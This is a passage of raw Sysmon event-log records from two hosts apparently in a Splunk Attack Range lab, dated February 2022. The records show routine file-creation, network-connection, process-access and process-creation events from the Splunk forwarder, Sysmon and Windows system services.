AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FB64B85591F99D746BC97820556A1D5,SHA256=978600D255114FC10600CB32F327CC3B21AF0B582D8CAB784BE247C7EA41DA88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.589{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-128MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:46.644{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53340-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000286481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:45.878{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53339-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:45.878{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53339-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:48.248{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A72E418D47F9FAB7AACD66D326F9938B,SHA256=0C581378959EE188E6ABE9998CAA0FE08E31B26F4079B9CEF7EF449D744036AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.323{4F8D34B0-0FE4-6216-2904-000000003902}1816716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FE4-6216-2904-000000003902}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0FE4-6216-2904-000000003902}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.057{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FE4-6216-2904-000000003902}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:48.058{4F8D34B0-0FE4-6216-2904-000000003902}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:49.279{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B88221D692119EB6CB8610C73A967E5,SHA256=67AB5F4D841F2A96CA3BEDA650CA46664AE1794126FA904A6006356A9673E10D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.651{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF02DB0FACD70EC6FEE6460F6E1743B7,SHA256=A58ED327E00C2A3A5BADE40FBCB4DC0F0DB05B49B0D0CF165EACF894C61839A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.526{4F8D34B0-0FE5-6216-2A04-000000003902}33122728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FE5-6216-2A04-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\S